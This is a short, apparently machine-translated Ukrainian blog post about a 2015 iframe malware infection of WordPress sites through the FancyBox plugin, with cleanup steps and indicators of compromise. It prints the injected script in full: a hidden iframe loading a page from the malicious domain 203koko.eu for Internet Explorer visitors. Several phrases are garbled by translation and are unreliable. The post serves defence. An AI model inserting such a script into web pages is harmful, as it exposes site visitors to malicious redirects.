[Зловмисне програмне забезпечення iframe 203koko] Веб-сайт WordPress Заражене шкідливе програмне забезпечення

Раніше на цьому тижні ряд сайтів та блогів WordPress, отримав попередження від шкідливі інфекції через Google Веб-майстри.

Проблема, до якої Google Веб-майстри згадується є наявність код / сценарій шкідливе програмне забезпечення iframe вихідні веб-сайтів.

<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>

Здається, що це вразливість a підключатиAcquis FancyBox для WordPress який до вчорашнього дня (05.02.2015) ніколи не оновлюються протягом тривалого часу.
Вирішуючи цю проблему і лікування вірусів сайтів з цим шкідливим програмним забезпеченням, є відносно простою.
1. Вимкніть плагін FancyBox.
2. Видалити всі файли плагінів FancyBox з сервера (через FTP)
3. Встановіть нову версію плагіна (FancyBox 3.0.4)

FancyBox для WordPress 3.0.4

- Перейменовано налаштування, на яке вплинула проблема безпеки, згадана в 3.0.3. Це має запобігти появі шкідливого коду на сайтах, де є плагін updated без видалення шкідливого коду.

FancyBox для WordPress 3.0.3

Виправлена ​​проблема безпеки.

Інформація про шкідливі програми: 

ТИП: Iframe перенаправлення
TARGET: WordPress fancybox
MALWARE домен: 203koko.eu
Шкідливе URI: http://203koko.eu/hjnfh/ipframe2.php
ШИРЕВИЙ КОД КОМПАНІЇ:
НАПИСАНИЙ ЗАБОР: if (navigator.userAgent.match(/msie/i)) { document.write(‘

Видаліть шкідливе програмне забезпечення зі свого WordPress сайт.

Засновник і головний редактор Stealth Settings, з 2006 р. по теперішній час. Досвід роботи з операційними системами Linux (особливо CentOS), Mac OS X, Windows XP> Windows 10 si WordPress (CMS).

Залишити коментар